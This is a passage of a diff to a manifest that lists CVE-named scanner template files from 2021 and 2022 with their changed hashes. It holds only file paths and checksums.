-http/cves/2021/CVE-2021-42565.yaml:25784a1f396073d772bf43c2165de55d25e81396
-http/cves/2021/CVE-2021-42566.yaml:c34ee62b1a8de18285d29de7a956f4557737d036
-http/cves/2021/CVE-2021-42567.yaml:7ae783b7b92250aec984d885ed925d83201566bd
-http/cves/2021/CVE-2021-42627.yaml:19353bc398ef84587c5bd47a7be06a42f548bf14
-http/cves/2021/CVE-2021-42663.yaml:b8a11530ea7c570daffee8278a88101cf7a6759a
-http/cves/2021/CVE-2021-42667.yaml:91160d288144d6eb8f5358ddf3fb3f7dbfb26764
-http/cves/2021/CVE-2021-42887.yaml:e8aadbac7d9d62d066040d90ab2596b1a0a9e0d0
-http/cves/2021/CVE-2021-43062.yaml:1d8fd9f59904b6a1af4395c8feb22e66371137b6
-http/cves/2021/CVE-2021-43287.yaml:ecbdcaab2f015e64a00d68e00ebc750a88faacbf
-http/cves/2021/CVE-2021-43421.yaml:029f940d786ac23f55c2f0d1e4c08be2809c3cfa
-http/cves/2021/CVE-2021-43495.yaml:7df0b43b00b283f62f2820c373f574916e9f8a8a
-http/cves/2021/CVE-2021-43496.yaml:2055539849ac3667c062a70b41417f1eca6e09d4
-http/cves/2021/CVE-2021-43510.yaml:d42cc666921d726e2c8ea237c216957fa2a09e2b
-http/cves/2021/CVE-2021-43574.yaml:404ad58fe1e363e2e80d34e1e95f338011c701f1
-http/cves/2021/CVE-2021-43725.yaml:35baf64d5665ff2832989a3579a32263f75b9346
-http/cves/2021/CVE-2021-43734.yaml:793de8a3f0e7603e937e1b09a8d9de63e8284057
-http/cves/2021/CVE-2021-43778.yaml:db70959410a09f5243b611eb8e2901ff24a686bb
-http/cves/2021/CVE-2021-43798.yaml:7599b5ed461af2205f2da304a399a381cc1410a9
-http/cves/2021/CVE-2021-43810.yaml:849316ad2c4506623b8f4f32dd602a0347ae3efb
-http/cves/2021/CVE-2021-44077.yaml:855dede6c033033342df66565f3100c93dc66adb
-http/cves/2021/CVE-2021-44138.yaml:47bbed9e241aff1a20546157c275d8b5d14976c7
-http/cves/2021/CVE-2021-44139.yaml:6908e41660607a7ceaa21e81c850085155c536e0
-http/cves/2021/CVE-2021-44152.yaml:1ad6c34b3fc8c0247fc45b4c0e34e70377534ae9
-http/cves/2021/CVE-2021-44228.yaml:354fb90dd5f70c026591478f86d1ac79f892c249
-http/cves/2021/CVE-2021-44427.yaml:0af89c575aaeebc1efb817f3492b2a8ce337558e
-http/cves/2021/CVE-2021-44451.yaml:8fcf50e1ed28d8985a2f221b3e9561abe155e1bd
-http/cves/2021/CVE-2021-44515.yaml:1a174e3b06a44c36e345a50846bec9bb64f8affc
-http/cves/2021/CVE-2021-44528.yaml:bf900c3d32a6a5bb16dcda3ca288504e9ee9a73e
-http/cves/2021/CVE-2021-44529.yaml:d18bb77258faf261b19c46cd1f9522e781665e74
-http/cves/2021/CVE-2021-44848.yaml:598b26009981dcf9d71b1e2dbe2739c89554ac5c
+http/cves/2021/CVE-2021-41773.yaml:3745c880beb59a44cc8134472f2d18d0d82a81d1
+http/cves/2021/CVE-2021-41826.yaml:534c7da3018b18aada060ecb19d0e0c2eec6e61b
+http/cves/2021/CVE-2021-41878.yaml:085cff3ffaf60d1d408dca5caad841ee0497082b
+http/cves/2021/CVE-2021-4191.yaml:7e14d313538656657719e87d1b633d7343c42f3a
+http/cves/2021/CVE-2021-41951.yaml:cda9efd5dcadfb60785f1dedb5edd78c479e718d
+http/cves/2021/CVE-2021-42013.yaml:42629e8a71246ba1c250e55231d3d5db01c58b13
+http/cves/2021/CVE-2021-42063.yaml:4f2bcfee3c5e927f8d12ce5d39b30d21cfce3b63
+http/cves/2021/CVE-2021-42071.yaml:405b814daa63067b7219743064bacead3f83545c
+http/cves/2021/CVE-2021-42192.yaml:77ea1500e93e114ff09509758df054d075b7e1dc
+http/cves/2021/CVE-2021-42237.yaml:aaf63e59738cae28c8c018256cc3b9fe448853ff
+http/cves/2021/CVE-2021-42258.yaml:36cba21f1b08f02713e4cf4e256aaa96665612c7
+http/cves/2021/CVE-2021-42551.yaml:f94c5da244343db283be6cc46f0ba47efed625e4
+http/cves/2021/CVE-2021-42565.yaml:8430e01e09407376da2428d02546b399e0c579cc
+http/cves/2021/CVE-2021-42566.yaml:05ef92162d54ab8d946db4ab1d5a4d7ebafe22b1
+http/cves/2021/CVE-2021-42567.yaml:0f28432392a893d9370120ab9e45fdce88ce00ce
+http/cves/2021/CVE-2021-42627.yaml:39beefb7c749c259b281e5bf7400d67d7f1b90da
+http/cves/2021/CVE-2021-42663.yaml:a4319a34b52acaf340dff0bf3d2fba72b863a575
+http/cves/2021/CVE-2021-42667.yaml:6cafc7d823ff05812a2f4690b1314156e2c43696
+http/cves/2021/CVE-2021-42887.yaml:454075a84de682b21d3e625f34860678b3b10907
+http/cves/2021/CVE-2021-43062.yaml:d22a171580b0374aaa109fea9b8df45e1813883c
+http/cves/2021/CVE-2021-43287.yaml:53e2c258736ab7948e16866377518a30777478b3
+http/cves/2021/CVE-2021-43421.yaml:a25266e1675390db8bb56bc96f0f828f4b34b3bb
+http/cves/2021/CVE-2021-43495.yaml:16bb99a6c9f3f1812e77e98acdff900a966db086
+http/cves/2021/CVE-2021-43496.yaml:cdad5876f1dff61062d31fbe6af09e87136365d3
+http/cves/2021/CVE-2021-43510.yaml:7a1e18b52267c9872b108241b5907691ab0bcc78
+http/cves/2021/CVE-2021-43574.yaml:b685f83157574491288a01f0f614845126f41423
+http/cves/2021/CVE-2021-43725.yaml:4650889bf0c15c587bf5ad0e33e7ddd1677e025d
+http/cves/2021/CVE-2021-43734.yaml:86cbc19626da263b2f7d29cb40c75ddebec9ad4d
+http/cves/2021/CVE-2021-43778.yaml:aca8ef2e80d100c3fd60d719038cf22278524ce3
+http/cves/2021/CVE-2021-43798.yaml:b55233fb163ed0c9d883fdb1edeb9a273340d712
+http/cves/2021/CVE-2021-43810.yaml:8b91181bf680b983db500159fa0e2a5e5e5dee07
+http/cves/2021/CVE-2021-44077.yaml:5bf17f3f17867b390f7837cf5da6f1029c679ef6
+http/cves/2021/CVE-2021-44138.yaml:df886c1b96d059c61a7aa282f9abe546b74fbf1e
+http/cves/2021/CVE-2021-44139.yaml:1f6d7f4d4a1b2264b2719dd1055eb7f324613794
+http/cves/2021/CVE-2021-44152.yaml:398c66fdac8a9ff369f4acd7e29ec1d7c575cc30
+http/cves/2021/CVE-2021-44228.yaml:35b2832840defd52da15ecb6e987367e4f9d7d4e
+http/cves/2021/CVE-2021-44427.yaml:ee24c7faedc8c189fbe543c3cc94921ed2249166
+http/cves/2021/CVE-2021-44451.yaml:3edf61d9c2aa814a6c1ea7b8e255352917070324
+http/cves/2021/CVE-2021-44515.yaml:4564e132f1f1dd086f000ede615a072bbf38ffb2
+http/cves/2021/CVE-2021-44528.yaml:24f07ed18350a53f4e52002f88a8044db698a0ec
+http/cves/2021/CVE-2021-44529.yaml:e1f8e7ef6dec9a5978fa956ffa3099a25bc83b86
+http/cves/2021/CVE-2021-44848.yaml:7dbd152b48c3bd6c194a591b34aeebaae3b26bb0
 http/cves/2021/CVE-2021-44910.yaml:0b77f763b96a2cf5db1702425eca154ba333338c
-http/cves/2021/CVE-2021-45043.yaml:1786e7a02eef8d252ea01feea20717b4b8662f9a
-http/cves/2021/CVE-2021-45046.yaml:1b40070abb48f46b3ebcd2a46cfd06ee7bf98355
-http/cves/2021/CVE-2021-45092.yaml:7714457ce442995de289424394c500ea4edfc104
-http/cves/2021/CVE-2021-45232.yaml:075bbc53ba98786cb90d14404980731b756ce29b
-http/cves/2021/CVE-2021-45380.yaml:7503d428e75f1cc2724f66336ac656cc3949afca
+http/cves/2021/CVE-2021-45043.yaml:4ae92d706fab6043d571abf35c744a44cefe7ff0
+http/cves/2021/CVE-2021-45046.yaml:bf056166cfb8db4f01ce8211ed7ddc8a780bb6ce
+http/cves/2021/CVE-2021-45092.yaml:173633860d773d09555cdff0db82a750f4aceb07
+http/cves/2021/CVE-2021-45232.yaml:ad33a0e00b0c619ab3a37cde3e7d108b25413108
+http/cves/2021/CVE-2021-45380.yaml:96906d1bc3f00a236137c763809d0a347f8404b6
 http/cves/2021/CVE-2021-45382.yaml:1bbda34b3ebd4d8eb1d5af661a216557db1f8147
-http/cves/2021/CVE-2021-45422.yaml:096aab191ef442dfdff8421aed50cb9cd175a0c1
-http/cves/2021/CVE-2021-45428.yaml:0c704ea977fc260bb8db841172c5b40864a42c7d
-http/cves/2021/CVE-2021-45967.yaml:11182aa345e5ddae30d64feb385266911f9acfb8
-http/cves/2021/CVE-2021-45968.yaml:bdd43464b67a67d1d372ccf668902f84bd68b9df
-http/cves/2021/CVE-2021-46005.yaml:48bf1a04c84ee01dc836f0b2c78b5eaa8fb0ddb0
-http/cves/2021/CVE-2021-46068.yaml:251d65b4383621fe0c4aa64e270c52f2de38a3c1
-http/cves/2021/CVE-2021-46069.yaml:9c1aa14e69c8022343417308cdeb0d19ce3ad66b
-http/cves/2021/CVE-2021-46071.yaml:8fa6042370c75ae79d01d32cedc43fd8cdcc3712
-http/cves/2021/CVE-2021-46072.yaml:f4fe780a7144f2ed19014984d9f857bdc4d55c13
-http/cves/2021/CVE-2021-46073.yaml:d0761f6af6d6379bab243807183699b457a6bafb
-http/cves/2021/CVE-2021-46107.yaml:4c338974202514a0b90753d356e77ff464e121c4
-http/cves/2021/CVE-2021-46379.yaml:f57cd9ab50d341c22e0a8af653ddd7a3bdbdde73
-http/cves/2021/CVE-2021-46381.yaml:16e49d77b608f2879f81576d4a7e8a0446f2d518
-http/cves/2021/CVE-2021-46387.yaml:65f51d06945c98e20415fbf5231c953fed4e29a8
-http/cves/2021/CVE-2021-46417.yaml:fac02768b6b7bcdbb8d17d24cd7b1935bcc85e43
-http/cves/2021/CVE-2021-46422.yaml:1545d3fc088d4aef893e1d098fe414783e95bf86
-http/cves/2021/CVE-2021-46424.yaml:33cf5129ad52f067d245fbeea8eddd2a6b7a8d7c
-http/cves/2021/CVE-2021-46704.yaml:20f5f33d29fb004cae9646024e2e82615c5b80d5
+http/cves/2021/CVE-2021-45422.yaml:dc283cda1d97c5aa01b533d10c92c420643db182
+http/cves/2021/CVE-2021-45428.yaml:0c0d288e83b9f5c704decd358d4bc4c23198f761
+http/cves/2021/CVE-2021-45967.yaml:281125854adfd44cec449c21b2430f5041691a71
+http/cves/2021/CVE-2021-45968.yaml:afb0e6050685cdf8f5a9771c00b3e3a64fafc6b6
+http/cves/2021/CVE-2021-46005.yaml:13edca4797f1880d8ca258a832d965592f2d96d3
+http/cves/2021/CVE-2021-46068.yaml:757d38b693b6fc542839bff59a52c2de3d634224
+http/cves/2021/CVE-2021-46069.yaml:e18038f8c66366997f1bb854b4fb4ea0d7110109
+http/cves/2021/CVE-2021-46071.yaml:6396c8c2a3afcf4d976ffdb59d856f16a8a0a7dd
+http/cves/2021/CVE-2021-46072.yaml:ef6df66525b253d07d290206eacf5538c3cbfb7b
+http/cves/2021/CVE-2021-46073.yaml:b26fdab859f7671ec3c60b87a83ac32ae48e0363
+http/cves/2021/CVE-2021-46107.yaml:5d57209468685190ce2dab169cc08d84130ca2c3
+http/cves/2021/CVE-2021-46379.yaml:0b1fa590ad3c9d38371f53d6d8a459a3f7005477
+http/cves/2021/CVE-2021-46381.yaml:9d8b27f28a40e3d29de881d0173caf2acd078903
+http/cves/2021/CVE-2021-46387.yaml:5a08ebd26ff807bcc6e376e53bc9fc258624ef8c
+http/cves/2021/CVE-2021-46417.yaml:1102f05811373229b2e710a6b45a5e31e863cb42
+http/cves/2021/CVE-2021-46422.yaml:2a9ba3c4bb782294ff4300956c516d2e599ac8d6
+http/cves/2021/CVE-2021-46424.yaml:cffb7274352febb85ce13efbafcae2fdff188f12
+http/cves/2021/CVE-2021-46704.yaml:5f830eed8b45faeeb5cf258fc78f29551d21e593
 http/cves/2022/CVE-2022-0087.yaml:e2a237e68dafbc58ec0636137e9cc5ff4eecc06f
-http/cves/2022/CVE-2022-0140.yaml:9c39b6b8e1c37ee7a692702c6002765f66b9ab3c
-http/cves/2022/CVE-2022-0147.yaml:5d8eef9563f4d754892914795256296b3ce41b9e
-http/cves/2022/CVE-2022-0148.yaml:6af239cfb29b08473eaa7d16a7243719339f95c2
-http/cves/2022/CVE-2022-0149.yaml:e17d6ea2dbdf13af74d2936fb2655d98792e74d3
-http/cves/2022/CVE-2022-0150.yaml:2a6e792805a60e5b4159e919e6b4d4f641828906
-http/cves/2022/CVE-2022-0165.yaml:23bd0a51e3b0a8092913be02b413ecefb8fd2435
-http/cves/2022/CVE-2022-0169.yaml:90cf2f7c3cd441701dd43bd53eaeb41148a01dc3
-http/cves/2022/CVE-2022-0189.yaml:9cf508245725249cd0cbaa7fa14d33339484f64a
-http/cves/2022/CVE-2022-0201.yaml:9ceb50382f446aaccb489b5903021c419f16fa8c
-http/cves/2022/CVE-2022-0206.yaml:8aa89ee00b1ce0f526b1de5c5d089c540355e69d
-http/cves/2022/CVE-2022-0208.yaml:e22967ba73bec96dd869fba5072f0388d1938ba5
-http/cves/2022/CVE-2022-0212.yaml:e0b83689624c667b9142426a7db901d9923488fa
-http/cves/2022/CVE-2022-0218.yaml:63145b62a4e4a62614cc9d126db13d16e580c332
-http/cves/2022/CVE-2022-0220.yaml:fd4096ae2323b93691099f2b66ec5809b03b2834
+http/cves/2022/CVE-2022-0140.yaml:7e04507bfcaace3094d0ace11c9bc6a199d4dec6
+http/cves/2022/CVE-2022-0147.yaml:ea5759da63ae284cfefa0308d816ee3cf6d48a75
+http/cves/2022/CVE-2022-0148.yaml:480bc45a1f6003a3e801ca52b1a5e0f170b095d7
+http/cves/2022/CVE-2022-0149.yaml:b78b31bfc5b790f4c42d399b828bf70ad495e908
+http/cves/2022/CVE-2022-0150.yaml:cccd46316ba44f182308f9abe31afcbfd2c8bbc9
+http/cves/2022/CVE-2022-0165.yaml:3c72799c81037da61a2047beec9d361a36078656
+http/cves/2022/CVE-2022-0169.yaml:2229312920ead89b3863326dde05d194ce2f9622
+http/cves/2022/CVE-2022-0189.yaml:3fe202064f49ff68c4b7ce62d18db3d5dc18a037
+http/cves/2022/CVE-2022-0201.yaml:9cd5bb5bfae98390241acf475dccae87a69f6274
+http/cves/2022/CVE-2022-0206.yaml:885357781d4ea59c78d854d9f36dda3c38917ad0
+http/cves/2022/CVE-2022-0208.yaml:719c713d73bbcbe83ac9e560c4fbdfb56858b74c
+http/cves/2022/CVE-2022-0212.yaml:820a16655dc91526a9f50a7b0c5286262bb8b547
+http/cves/2022/CVE-2022-0218.yaml:73b64e8c124b16f09e08c594f02c89ef2d52965d
+http/cves/2022/CVE-2022-0220.yaml:a577d0d9cd04b1efc44839b4989ea4493a23bfef
 http/cves/2022/CVE-2022-0228.yaml:30119e83853700f628e477579810158008ee6f73
-http/cves/2022/CVE-2022-0234.yaml:192b3129434ca19c34341f01d93773aa049240fd
-http/cves/2022/CVE-2022-0271.yaml:b7a96e392b007cf81380f0917c3d9a1cb0c0464a
-http/cves/2022/CVE-2022-0281.yaml:350bb531fe6cad94476c83964a5d9327571d20a2
-http/cves/2022/CVE-2022-0288.yaml:ae5df181333606c23a98c843b7d12e6b36a65d07
+http/cves/2022/CVE-2022-0234.yaml:348788481367fdc4ecd9d904c1700edca1030b43
+http/cves/2022/CVE-2022-0271.yaml:f81049bb3174752d03d6707640d3b376c256d775
+http/cves/2022/CVE-2022-0281.yaml:0d499a8978e321a62fabc08f9b9d9242a6fc2279
+http/cves/2022/CVE-2022-0288.yaml:e566683fcfea04cf4421d263738c2ca2a749c20d
 http/cves/2022/CVE-2022-0342.yaml:1f2cdd470689cc89cbb791deedcda3044cab4410
-http/cves/2022/CVE-2022-0346.yaml:51b7d9da4faf999d50ab3ee757a439b8bdc46bca
-http/cves/2022/CVE-2022-0349.yaml:0ce17729d4fbc7c6e3ff1f24aa146db8893c21d0
-http/cves/2022/CVE-2022-0378.yaml:89d8a920cc677b9a1a83c6578f1bb9bd4b171ff9
-http/cves/2022/CVE-2022-0381.yaml:9bbc5b303bb932a001a2d481bc28bed7644b5582
-http/cves/2022/CVE-2022-0412.yaml:3fb61a708fdf4441fa9e8bf3cd88e11e6ec1fd0c
-http/cves/2022/CVE-2022-0415.yaml:69284389798831ece9cbe32a479964028a902b20
-http/cves/2022/CVE-2022-0422.yaml:5caf2a187af6cd3dc39ab50713e2332740d5257b
-http/cves/2022/CVE-2022-0432.yaml:3b3b14e759f25105ce3b0ab1a6cdcb792edac825
-http/cves/2022/CVE-2022-0434.yaml:fb9bf05d0a517615c0c6919af9632c2777c9504e
-http/cves/2022/CVE-2022-0437.yaml:9534574686baf028857d2e4a5307c6f9301e0f34
-http/cves/2022/CVE-2022-0441.yaml:4035a23ba521215f099c4ae2484c444f927c943a
-http/cves/2022/CVE-2022-0482.yaml:b27965b1d900ff6e0b5d6278ff811984385e87e8
+http/cves/2022/CVE-2022-0346.yaml:44a552e58eb2f128cd7331c6a500f6451ceccc87
+http/cves/2022/CVE-2022-0349.yaml:91380e30210f5884838152b0795a718b5623664b
+http/cves/2022/CVE-2022-0378.yaml:4dba814ec5afb8e7be94805fa8d65f87cf1ff401
+http/cves/2022/CVE-2022-0381.yaml:05780df7543b8e36d17e53e13cc2f734dc426ef9
+http/cves/2022/CVE-2022-0412.yaml:277bd364a8ea0b70724484815c6a3c94eca3d1e9
+http/cves/2022/CVE-2022-0415.yaml:8079a69355e194f2982518b05734844a8d6fe7aa
+http/cves/2022/CVE-2022-0422.yaml:a6b5c3a4923283d44dc11a86f5350548cc181e0a
+http/cves/2022/CVE-2022-0432.yaml:3236e67d92067aca961afb2a5daa992758426f70
+http/cves/2022/CVE-2022-0434.yaml:0efb0afaeddb47d18a6a81f0dcd099cd71f8831e
+http/cves/2022/CVE-2022-0437.yaml:e2a63edb7971f2649f60271b21a6225e96372c71
+http/cves/2022/CVE-2022-0441.yaml:f39868196fbae1d602bd0d79b9f81a3965190f2a
+http/cves/2022/CVE-2022-0482.yaml:d98d6d208becc8d821eb7fe3364178573c90bc45
 http/cves/2022/CVE-2022-0533.yaml:d7e371434fc56f9f365fb4436bd829574f7cab46
-http/cves/2022/CVE-2022-0535.yaml:ca7f82e14f84cbc0e786d5bc17c93ef65ffbba7c
-http/cves/2022/CVE-2022-0540.yaml:4723c2c3212fbbd3932026535a90ead8b55ed120
-http/cves/2022/CVE-2022-0591.yaml:c0ff8da0bd4f53f3d92fe4c022a46fc0b7699949
-http/cves/2022/CVE-2022-0594.yaml:8fd4e444cac45823560b27b341a146e9b4e7fffb
-http/cves/2022/CVE-2022-0595.yaml:ed294668add1ec8ba2fd7919f4cb49652d7ae6a2
+http/cves/2022/CVE-2022-0535.yaml:e3ec603e666f2440e1d360eded8ee3977b1120be
+http/cves/2022/CVE-2022-0540.yaml:62be4e5c57ac94fbcfd890601b215558559e72d9
+http/cves/2022/CVE-2022-0591.yaml:782f1e53b78422c61845cd764634fce804eb8238
+http/cves/2022/CVE-2022-0594.yaml:b280049f1c01fd910b4f99b9be1568ebf87fa008
+http/cves/2022/CVE-2022-0595.yaml:22dbef5e584ac531b436d0a0a4a6cb1319ebb848
 http/cves/2022/CVE-2022-0597.yaml:04ba95f6a333061040ec361c347a2f3646b95481
-http/cves/2022/CVE-2022-0599.yaml:acf301a6742035f540014792734b910587aafd94
+http/cves/2022/CVE-2022-0599.yaml:7aba4f7ad8ca3dbb7997bffe93982967d17c440a
 http/cves/2022/CVE-2022-0651.yaml:b266cda588c7f2e9114402d053c39771a21e262b
-http/cves/2022/CVE-2022-0653.yaml:f9fc6a538cc33373bbfa34b74e0e13b010800c32
-http/cves/2022/CVE-2022-0656.yaml:8116e0989a6f8fa4915c54e113326913dd17ad88
+http/cves/2022/CVE-2022-0653.yaml:8ef05750c7b0b0a49b1ee0bdc81120aac129ce24
+http/cves/2022/CVE-2022-0656.yaml:75431ad2849800ac48eb95ec7b7b562f8f3c0831
 http/cves/2022/CVE-2022-0658.yaml:51db3865f3a6c68b8e4357a90b917e73c058a291
-http/cves/2022/CVE-2022-0660.yaml:f2164567244671f6e1dfa83139fdaf9ba4ff8383
-http/cves/2022/CVE-2022-0678.yaml:8ff21a80309ab31463487b470ec30bc0011f256b
-http/cves/2022/CVE-2022-0679.yaml:5774c471cfa38cd7ec22970bef8923806f602bd1
-http/cves/2022/CVE-2022-0692.yaml:36bcfe595a79f81d916f605d3b119a21ba3cd1fe
-http/cves/2022/CVE-2022-0693.yaml:d6d6f6b6f25bc994cc03d5fddab1ef1696f2fd37
-http/cves/2022/CVE-2022-0735.yaml:7212377cf65941396de772d496288c3ada76829d
-http/cves/2022/CVE-2022-0747.yaml:d1c42ec6731e1c465b1d14bed8a5d041ac894c2e
-http/cves/2022/CVE-2022-0760.yaml:2b62f4a5b25a7609331a7affbf7122545bdf5430
-http/cves/2022/CVE-2022-0769.yaml:709ccdea01260625bebf3812883bb343fab0ef94
-http/cves/2022/CVE-2022-0773.yaml:a3669e3c091965e42fa3f7bba453bba812783f3c
-http/cves/2022/CVE-2022-0776.yaml:89d6ec91a48df536b7758c8e971a929a4b9ac064
-http/cves/2022/CVE-2022-0781.yaml:370cb93e20d71cf0be3a41aa4b52f125000813c4
-http/cves/2022/CVE-2022-0784.yaml:46036a09d6ac74e1fb4dc3f194f12d8a58d4a719
-http/cves/2022/CVE-2022-0785.yaml:f0479027b26088bbc2260f41e78ea2f00a8ab00f
-http/cves/2022/CVE-2022-0786.yaml:b0af5b9c5857bfaf31a3cea47c9b0104c8846250
+http/cves/2022/CVE-2022-0660.yaml:20c1298728c308ff28c368240ad0c37cd89a61be
+http/cves/2022/CVE-2022-0678.yaml:59489a8008060f84d4b5eadcb96acab32e7ca5f0
+http/cves/2022/CVE-2022-0679.yaml:424ff7885c3bf236c0bb17a88d8e2818334950fd
+http/cves/2022/CVE-2022-0692.yaml:bfed3c8bd99bd8aa210b5e1448c95be21a99fe73
+http/cves/2022/CVE-2022-0693.yaml:d15a2bd721bc64fa7352f30f17e50bdffdf60235
+http/cves/2022/CVE-2022-0735.yaml:9319024e45a5edc883ee2148e4104de2b350464f
+http/cves/2022/CVE-2022-0747.yaml:56281fb859d706ca3aeb7a43dda787085b21af27
+http/cves/2022/CVE-2022-0760.yaml:b74019a33fae6940c4d987f12e0eeb31417af6e4
+http/cves/2022/CVE-2022-0769.yaml:0a07692fcdb55ccfd0ae57d41dcc750208ccbda4
+http/cves/2022/CVE-2022-0773.yaml:5e8be02be2b4e2f3e67af5cc29306b79b424eb6a
+http/cves/2022/CVE-2022-0776.yaml:57c9b8456d03acbe4aa244a6d99cc6586213d911
+http/cves/2022/CVE-2022-0781.yaml:63b185e258921264f84aedd2416ac3c3663e9651
+http/cves/2022/CVE-2022-0784.yaml:5dfbaf2bd4ac4a785e9e7d879dee710dd250f8e6
+http/cves/2022/CVE-2022-0785.yaml:d0a20a1675579199c6bcdc99493e9927a08a0c75
+http/cves/2022/CVE-2022-0786.yaml:a5275679d2949a95420e2172ca31d1d1c833e910
 http/cves/2022/CVE-2022-0787.yaml:07cee20bbc399e3ea0378cbc9e5a801816561ebc
-http/cves/2022/CVE-2022-0788.yaml:d5e04e7348f344d666e347bb44a497d91e8a14a2
+http/cves/2022/CVE-2022-0788.yaml:52c82e6a3e5b79a0a5f1082572423b261f922457
 http/cves/2022/CVE-2022-0814.yaml:613e884d486a1a68629f576d5c8a6679d97b71db
-http/cves/2022/CVE-2022-0817.yaml:e32cb1b6ed982adb9a0530a98ff072a1792e70ce
-http/cves/2022/CVE-2022-0824.yaml:14c118f4bcec078204f12c65d16d1434fcf920ab
-http/cves/2022/CVE-2022-0826.yaml:dfd7d85ac0353cc2f8a2619726233e8d08e47b26
-http/cves/2022/CVE-2022-0827.yaml:e896322ab3567c8de87162a7f598fcd7a08df323
-http/cves/2022/CVE-2022-0846.yaml:0d5f653da4131ecf59d61a00cfc7f9f5b6f5e244
-http/cves/2022/CVE-2022-0864.yaml:3699a18b952cc35ccc554697591c3d3b423b03fa
-http/cves/2022/CVE-2022-0867.yaml:ae5e60998ba6761ba03faa1ba248e725a49a352e
-http/cves/2022/CVE-2022-0869.yaml:cabb983feda1708ee003343eb2609f8236c96f85
-http/cves/2022/CVE-2022-0870.yaml:27fb5b345604228065e0a25623d5f4e7766df425
-http/cves/2022/CVE-2022-0885.yaml:fef7497d1aa9ae5cc779552f8046d1bcaaf56969
+http/cves/2022/CVE-2022-0817.yaml:ed02c2333803af53848ad68a9b068070542e5baf
+http/cves/2022/CVE-2022-0824.yaml:84a0551fce6c4827923341d7163e18bc555c9b8c
+http/cves/2022/CVE-2022-0826.yaml:7600288f7d534c92ed4c65ca600b34ee768888b0
+http/cves/2022/CVE-2022-0827.yaml:0aca6638c65b8db3e14cb9e26d25a143476e88de
+http/cves/2022/CVE-2022-0846.yaml:11de0e033f62ef78be5cff80c43f43e13bd68787
+http/cves/2022/CVE-2022-0864.yaml:cb6124418cec6f6921f4718cbaf076a8856efc4f
+http/cves/2022/CVE-2022-0867.yaml:80768aa73f2d29b79bdf570cbedc7d76a5d799e2
+http/cves/2022/CVE-2022-0869.yaml:8beceba2fb4a7ee7f99e957b1f4af5fc7b6b5370
+http/cves/2022/CVE-2022-0870.yaml:10fb1e281a4974921f63d9ea5ddbe42f0fd86b85
+http/cves/2022/CVE-2022-0885.yaml:469c3a47e70ed6764d67e60c55d33aa806a768de
 http/cves/2022/CVE-2022-0899.yaml:dad0f267d3feefaceb8b4a8b6da6f8ad961c2d89
-http/cves/2022/CVE-2022-0928.yaml:57b646de90bc833f1efa3b322657b827ee44b142
-http/cves/2022/CVE-2022-0948.yaml:ff816d14f81b11c82f130ec47a8c3ee9e0505990
-http/cves/2022/CVE-2022-0949.yaml:510d48df0d0aa003e7153eef8ee2cb405fc1aafd
-http/cves/2022/CVE-2022-0952.yaml:1bfb236c07b3096ef3ac561bf60e43bdad632c48
-http/cves/2022/CVE-2022-0954.yaml:dc1d8e7ed97145e3eeef4dcb728c630860d32fbf
+http/cves/2022/CVE-2022-0928.yaml:d781375d23fd00e3da5effcdb5f0bb61c82db62c
+http/cves/2022/CVE-2022-0948.yaml:bf56beb1a7bf39f97a3c335b66fd3836738f2686
+http/cves/2022/CVE-2022-0949.yaml:7b75b74cc4de601e932eb617868c3b2d01f677bf
+http/cves/2022/CVE-2022-0952.yaml:07c28cfea1772fb2bd4d60391a6c8293e473e627
+http/cves/2022/CVE-2022-0954.yaml:78e2fd7d37e75549ab4ae36e38435ea8166e1378
 http/cves/2022/CVE-2022-0963.yaml:a4009f05235fedef56cb01a717246be5bf4fa098
-http/cves/2022/CVE-2022-0968.yaml:058b2666bd08d9eeb3b64e0b9f685c763b1ab29b
-http/cves/2022/CVE-2022-1007.yaml:100ad542056dd888075a9c5426297683b4d9afc4
-http/cves/2022/CVE-2022-1013.yaml:ad9a85e446716c6357c9e3c424e8af757db9ab7f
-http/cves/2022/CVE-2022-1020.yaml:ba6d5ff4ee5bab664b54f91260ab46ea3984d77e
-http/cves/2022/CVE-2022-1040.yaml:8275f16d305df48c2eb4e6a38b8cf4147793e8e5
-http/cves/2022/CVE-2022-1054.yaml:ecacfbae452439053570af88bd74a006c5006298
-http/cves/2022/CVE-2022-1057.yaml:326f9614bfe44bf1441e06df14e1adb3a6b40014
-http/cves/2022/CVE-2022-1058.yaml:fbc3a4799a48b64b3d27d2e76c7862dfb518ccea
-http/cves/2022/CVE-2022-1119.yaml:58dcb79c996a54a05b87f8ed49cf0da2311f85f6
-http/cves/2022/CVE-2022-1162.yaml:57e10ec4fec151a4446863358e5c2cb61a5042cd
+http/cves/2022/CVE-2022-0968.yaml:04a23829662d68a650642ba50c8f3d0c19ce22ff
+http/cves/2022/CVE-2022-1007.yaml:f9588f22d5fa1a0b830d38d9e951995ef008256e
+http/cves/2022/CVE-2022-1013.yaml:07eca1baea58e1ec4ff25252fb3a2373c652cbb9
+http/cves/2022/CVE-2022-1020.yaml:b874a743fa66ec3917920691bcaf033443472f98
+http/cves/2022/CVE-2022-1040.yaml:575d2191edacb933a580127fd22e6a04ecb5a15c
+http/cves/2022/CVE-2022-1054.yaml:a2d2814806e404cdf6ab318b4f2a650fc1f99393
+http/cves/2022/CVE-2022-1057.yaml:e83ea0632c9d850a5a59adeac34f53b85d348f77
+http/cves/2022/CVE-2022-1058.yaml:5363ce977ff8bdf4109f85894367816dbaf57042
+http/cves/2022/CVE-2022-1119.yaml:d19c7648adb5878c04751ee9ddaf3eb11326240a
+http/cves/2022/CVE-2022-1162.yaml:9cd4063799758fae8dfa8541fc99f75f6f949d4f
 http/cves/2022/CVE-2022-1168.yaml:51718e32b1a9e172ccb25bd03f5bca6e7805c52e
 http/cves/2022/CVE-2022-1170.yaml:c76d1ac0a767a994a7c796cb75553ad2c0ec3f51
-http/cves/2022/CVE-2022-1221.yaml:f3a04ce1aba085d5a6974ab97f2247bc93097e0d
-http/cves/2022/CVE-2022-1329.yaml:a755d0ada0eaeb52583789bf80e45199840116eb
-http/cves/2022/CVE-2022-1386.yaml:a18c3d8c51c1adc20240fab6c53bea15ecd0d477
-http/cves/2022/CVE-2022-1388.yaml:574a8ca0a398a46ffc13468d1a041182b549f942
-http/cves/2022/CVE-2022-1390.yaml:65e283353b9b3e8967067829bd238551fe2af739
-http/cves/2022/CVE-2022-1391.yaml:02ccf208163ed009a6170356f9a76ad5487f1f01
-http/cves/2022/CVE-2022-1392.yaml:483b06eff5681f225197f79f138e66ba976a6aed
-http/cves/2022/CVE-2022-1398.yaml:fb34b86ee3b3b997453b009e14cb2e5d4691712a
-http/cves/2022/CVE-2022-1439.yaml:f751c8011ceb2a10bc2c448c1797b0048109c0d7
